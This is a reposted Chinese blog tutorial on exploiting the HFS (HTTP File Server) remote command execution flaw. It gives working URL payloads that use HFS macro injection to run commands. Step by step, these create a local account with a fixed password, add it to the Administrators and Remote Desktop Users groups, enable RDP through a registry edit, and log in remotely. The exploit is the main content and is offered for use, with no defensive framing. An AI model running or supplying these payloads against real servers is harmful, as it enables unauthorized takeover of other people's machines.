自学内容网 自学内容网

渗透hfs任意命令执行

一、环境

网上自行下载

二、步骤

当启动hfs后

在页面执行payload即可造成回显:

/?n=%0A&cmd=ipconfig&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}V{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

我们使用这个命令执行漏洞去添加一个用户

添加用户ad/123456:

?n=&cmd=net user ad 123456 /add&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}V{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

成功添加:

将用户添加到管理员组和远程桌面组

/?n=&cmd=net localgroup "administrators" ad /add&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}V{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

将用户添加到远程桌面组

/?n=&cmd=net localgroup "Remote Desktop Users" ad /add&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}V{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

 打开对方远程桌面

/?n=&cmd=reg add %22HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server%22 /v fDenyTSConnections /t REG_DWORD /d 0 /f&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}V{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

尝试远控

输入我们刚才创建的ad和123456

成功控制


原文地址:https://blog.csdn.net/m0_68976043/article/details/140573882

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!